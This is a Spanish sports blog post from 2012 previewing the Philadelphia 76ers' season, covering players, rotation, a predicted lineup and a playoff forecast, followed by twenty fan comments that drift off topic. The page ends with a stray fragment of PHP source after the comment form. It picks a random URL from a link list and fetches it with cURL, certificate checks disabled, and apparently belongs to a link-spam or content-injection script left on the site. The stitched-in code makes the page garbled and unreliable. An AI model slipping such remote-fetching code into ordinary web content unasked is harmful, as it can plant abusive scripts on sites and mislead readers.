Philadelphia 76ers: Paso lento pero seguro

11 de January de 2012 por Hynreck

La temporada pasada sirvió en Philadelphia para ilusionar a los descreídos. Una temporada que comenzó realmente mal pero que sin embargo acabó con el equipo metido holgadamente en playoffs y mirando hacia un futuro cuando menos esperanzador. Muy pocos equipos en la liga disponen de un fondo de armario tan profundo como el de los Sixers, un banquillo que apenas desentona respecto al quinteto titular. Ese es su punto fuerte pero también su debilidad, ya que tampoco tiene ningún jugador diferencial al que encomendarse cuando el equipo está atascado.

En la dirección del equipo hay un chico que día a día mejora y va tomando galones. Jrue Holiday llegó sin hacer demasiado ruido, muy joven y con mucho margen de mejora. Las circunstancias le llevaron a ser titular y se aferró a esa oportunidad con fuerza. Anota, asiste y rebotea, y su toma de decisiones, si bien aún dista de ser la ideal, mejora día a día. Jodie Meeks le acompañará de inicio. Tiro exterior y poco más pero es justo lo que busca Collins en él. Es básicamente un jugador unidimensional que sabe su cometido y lo cumple de buen grado.

El jugador más parecido a franquicia que tienen es Andre Iguodala. Nunca será una superestrella aunque él esté convencido de que lo es. No es culpa suya, hay un hueco que él trata de ocupar con más o menos fortuna, aunque nadie duda de que rendiría muchísimo mejor como segunda espada.

El rendimiento de Elton Brand no ha sido ni será el que se esperaba. El ex-Clipper sigue siendo un interno de un nivel más que aceptable, de todas maneras se aguarda con ansia el verano de 2013 en que se puedan deshacer de esos 18 millones que cobrará. A su lado en la pintura encontramos a un Spencer Hawes que está teniendo un rendimiento en este inicio de temporada cuanto menos sorprendente. Las cosas pueden tener una razón o ser casualidad. Desconfiados como somos comprobamos que está en último año de contrato y nos vienen a la mente los Chris Wilcox, Erik Dampier o Damien Wilkins que esos años rendían a un nivel muy superior que los anteriores (y los posteriores).

Como ya hemos reseñado, la rotación es el punto fuerte de éste equipo con una segunda unidad de un gran nivel. Louis Williams es uno de los mejores sextos hombres de la liga. Sin ser un base puro puede funcionar como tal y no le quema el balón en los momentos calientes del partido.

Evan Turner puede considerarse la pequeña decepción del equipo. Puede hacer de todo pero parece que le falta creérselo. Su rendimiento hasta el momento no es el esperado para un nº2 del draft pero fundamentos no le faltan y en Ohio demostró que puede ejercer de líder. Está en su propia encrucijada. Veremos evoluciona hacia un Grant Hill o hacia un Shane Battier. Por su parte Thaddeus Young ha renovado este mismo verano. Se trata de un jugador muy versátil, capaz de jugar de 3 o de 4 y aportar anotación inmediata.

Andrés Nocioni también verá sus minutos aunque ya está lejos de sus mejores días, y no parece que se haga efectiva la Team Option que tienen sobre él a final de temporada.

Como relevos interiores aparecen Craig Brackins, que jugará algo más que en su año rookie y el veterano Tony Battie. Finalmente junto a ellos está el rookie Nikola Vucevic, quien en un futuro no muy lejano podría ser el center titular de la franquicia.

Los Sixers aún están dos o tres escalones por debajo de la élite de la liga pero son un equipo cuyos jugadores importantes aún están en pleno crecimiento. Les falta un jugador que lidere el proyecto. Tienen varios jugadores con potencial All-Star y puede que sea uno de ellos el que dé un golpe encima de la mesa. También podrían aprovechar la temporada que viene el expiring de Brand o esperar a moverse en verano de 2013 en la que debería ser la temporada que tengan como objetivo. Hasta entonces la exigencia será la de luchar por los playoffs y convencer a los hinchas (viene de ser el pabellón con menor asistencia) de que es un proyecto que puede merecer la pena.

Quinteto: Jrue Holiday-Jodie Meeks-Andre Iguodala-Elton Brand-Spencer Hawes
Sexto Hombre: Louis Williams

Pronóstico: Sextos del este, primera ronda de playoffs.

Comenta

20 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Quizá los Sixers hagan dentro de unos años un tradi estilo al de Melo, soltando 3 o 4 jugadores por 1 superestrella, o si los salario no les comen mucho antes, esperar a que acabe el contrato de Brand y listo, a buscar algo que suba el nivel.

      Citar

  2. Blade Petrovic dice:
    #2

    Meeks MVp yo creo que pueden ser un hueso bastante duro en los playofs

      Citar

  3. melo15 dice:
    #3

    A mi me parece que los Sixers tienen un equipazo y si Turner explota…
    Ademas tienen a Iguolada, que tal y como esta el Este, con Melo y Lebron es un seguro de vida, porque Iguolada es un pedazo de defensor.

      Citar

  4. Jabho dice:
    #4

    Coincido con el análisis. Haran una buena regular porque la plantilla es profunda y eso les ayudará en la comprimida season de este año. Luego en PO les veo carne de cañon salvo que lleguen como 4ºs a PO (que no es descartable que se lo peleen a los Hawks)

    Para mi el mejor sixers es de largo Holiday

      Citar

  5. melo15 dice:
    #5

    Bueno da igual 4 que 5 no? Y otra cosa yo no veo mejor a los Sixers que a los Pacers

      Citar

  6. infante dice:
    #6

    Jose Luis:
    Quizá los Sixers hagan dentro de unos años un tradi estilo al de Melo, soltando 3 o 4 jugadores por 1 superestrella, o si los salario no les comen mucho antes, esperar a que acabe el contrato de Brand y listo, a buscar algo que suba el nivel.

    no lo veo, las renovaciones de holiday, turner, hawes, igoudala….con los 18 millones de brand no les daran ni de coña….

      Citar

  7. Jose Luis dice:
    #7

    @infante

    ¿Qué no ves? ¿El trade estilo Carmelo 4×2, o esperar a que acabe el contrato y buscar agentes libres?

      Citar

  8. Sancho88 dice:
    #8

    Bueno, realmente sorperndente el salto de calidad de este equipo, que pasó de estar muerto con el deleznable Eddie Jordan a ser un equipo muy competitivo y sólido de la mano de Doug Collins. Creo que fue un error que traspasaran a Sammy Dalembert en su momento, un jugador que les daba grandes cosas, tanto en defensa como en ataque, pero claro, a cambio obtuvieron a Hawes, y caray con Hawes. Números de all star, ha perdido la alergia a la zona, ha ganado músculo y mantiene su más que decente tiro exterior. Sobre Vucevic, creo que antes de final de temporada acabará jugando de titular. Yo a Brand le veo como el típico Felipe Reyes. Algo viejo, pero se las sabe todas, ha estado en tantas batallas que sabe más por viejo que por diablo. Otro que compacta aún más el equipo y sirve de conexión entre los veteranos y los noveles. Sobre Nocioni, no sé en qué momento dejó de ser un jugador interesante para ninguna franquicia, pero realmente está infrautilizado, yo creo que para jugar sus 15-20 minutos sí que está. Y la batería de escoltas y bases… de las mejores de la liga. Entre Holiday, Meeks, Williams y Turner realmente, como bien dices, mantienen una rotación solvente, en la que nadie desentona, y logran continuar con un ritmo de juego muy similar todo el partido que les acaba por dar las victorias. Lo positivo es que ninguno va de divo, sino que todos aceptan su rol, y creo que es trabajo a reconocer por part de Collins. De todas formas, Sixers son un equipo de primera ronda, y si ‘Iggi’ y Holiday asumen más protagonismo, quizá den alguna sorpresa si les toca contra Atlanta o Indiana, o incluso Orlando, que ya sabemos la tendencia a desaparecer que tienen los J-RICH, Turkoglu, etc. Podrían estar en segunda ronda, creo que ese es su límite

      Citar

  9. Esteban dice:
    #9

    no se olviden q meeks juega por el pancho y la coka este año, poco mas de un millon, su renovacion sera muycho mas alta, igual que la de williams y holiday, mas el alto cofntrato de young, no parece haber mucho movilidad sino mantener su roster

    parecido a altanta, parecido a denver, e indiana, es decir si no tienes una super estrella en tu equipo o dos, dificilmente pases a finales de conferencia… segunda ronda es tu lugar como mucho

      Citar

  10. Sancho88 dice:
    #10

    Esteban:
    no se olviden q meeks juega por el pancho y la coka este año, poco mas de un millon, su renovacion sera muycho mas alta, igual que la de williams y holiday, mas el alto cofntrato de young, no parece haber mucho movilidad sino mantener su roster

    parecido a altanta, parecido a denver, e indiana, es decir si no tienes una super estrella en tu equipo o dos, dificilmente pases a finales de conferencia… segunda ronda es tu lugar como mucho

    Hombre, teóricamente sí tienen jugador franquicia en Iguodala, pero claro, dista mucho de ser un Lebron James, Paul Pierce, Derrick Rose… que seguirán copando semifinales de conferencia mientras jueguen. Muy difícil para equipos como Atlanta o Philadelphia progresar en playoffs con estos equipos tan bien armados

      Citar

  11. Esteban dice:
    #11

    Justamente sancho es lo q decia, ves q a veces coincidimos jeje

      Citar

  12. Sancho88 dice:
    #12

    Sí sí, pero no hagamos de esto una regla de oro xd, que me quedan dos análisis por publicar y espero que estés totalmente en contra. Si no esto será totalmente fraudulento, xd

      Citar

  13. Esteban dice:
    #13

    Estas viendo heat vs clips? Q delicia de partido dios

      Citar

  14. Sancho88 dice:
    #14

    Sí, partidazo. Hay que decir que creo que si a Spoelstra le han expulsado por lo que creo que le han expulsado (por protestar un tapón de Jordan sobre James que yo creo que estaba bajando), algo de razón tiene. Seguramente también estaría protestando de antes la falta de James sobre Billups de los tres tiros libres, etc. Lo que pasa es que no protestó igual antes de la prórroga, cuando tira James un tiro libre, Blake Griffin palmea el rebote y sale por línea de fondo a Miami, y en la repetición se ve la leña que le están dando al propio Griffin. No le han arrancado la camiseta Battier y Bosh de milagro. La verdad que el partido tenía alma de partidazo. Por un momento me he imaginado una final entre estos dos equipos. Creo que en el oeste se postulan para los cuatro primeros de la regular Oklahoma, Portland, Lakers y Clippers, y en el Este Chicago, Miami, Orlando e Indiana

      Citar

  15. Esteban dice:
    #15

    Q equipo serian los clippers con un alero de nivel medio mas, aunque sea un unidemensional q aporte algo concreto cuando sale butler, dicho sea de paso de una temporada esplendida,

    Tienen una banco horrible, pero mientras Mo entre y anote con tanta regularidad y evans ponga esa intensidad solo les falta un perimetral de mas regularidad, gomes es un desastre y foye una moneda al aire

    Los triples de morrow saltando desde el banco por 4 millones en lugar de gomes los harian geniales,

    Ayudenme, quien puede ser? Posey o thorton me suenan q estan libres, aunque para mi les vendria genial vushacic, no hay chances q vuelva a la nba verdad

      Citar

  16. Sancho88 dice:
    #16

    Yo creo que lo de Thornton les vendría muy bien. Además, ya conoce el equipo de su anterior época. Les vendría de perlas. Si quieren aspirar a algo, le deberían rescatar de los agentes libres. A él o a otro alero de perfil parecido. Posey es especialista en completar equipos aspirantes al título. Con Thornton u otro alero, podrían poner a Butler en su posición natural, que para mí es la de escolta, y jugar con Paul-Butler-Thornton-Griffin-DeAndre, con Billups de sexto hombre, Foye y MO dando descansos también y Evans para la intensidad defensiva, que le echa dos pelotas. Ya solo con el gepeto te acojona, xd. Por cierto Esteban, no sé si eres consciente del offtopic que nos estamos marcando en el análsiis de los Sixers. xd

      Citar

  17. Esteban dice:
    #17

    Lo expulsaron por q no pitaron una falta a paul para cortar el partido, termino en mate de jordan y diferencia de 5 faltando 5 seg, no habia falta, una tontera de los jugadores del heat no darla, hubo malos fallos para ambos lados, una interferencia de jordan, pasos de lebron, la falta a griffin, pero errores para ambos lados

    Creo q gomes apenas jugo 5 min y foye parecido, cook habra jugado 10

    Uergente los clips necesitan un perimetral q produzca, un alero, Mo es el unico q trae algo de la banca y juega de lo mismo q billups y paul,

    Quien podria ser?

      Citar

  18. Esteban dice:
    #18

    Si, pobres 76s jeje pero es la emocion del partido jeje tamb seria logico, ya q vuelve bledsone, un traspaso por Mo, pero por mejor q juege dudo q algun equipo quiera tomar sus 17 mill por los prox dos años, quiza hornets por ariza, q les vendria bien un base para q jack salga desde la banca y aminu de titular

    Hoy paul le gano el duelo a james con creces, y q decir q butler

    No se quien lleva esta estadistica pero me gustaria saber como es la racha de los clippers cuando sus 5 titulares estan en cancha, cuando esta su banca estoy seguero q son los peores, lo de hoy fue malo pero casi ni jugaron, pero ayer con portland en el duelo de bancos, los clips entraron 3 arriba y salieron 11 abajo en unos minutos…

      Citar

  19. Txusma dice:
    #19

    Este off-topic es de nivel…

      Citar

  20. Sancho88 dice:
    #20

    Sí, más o menos es como estar en una asamblea de Telefónica y ponerse a jugar al tetris

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>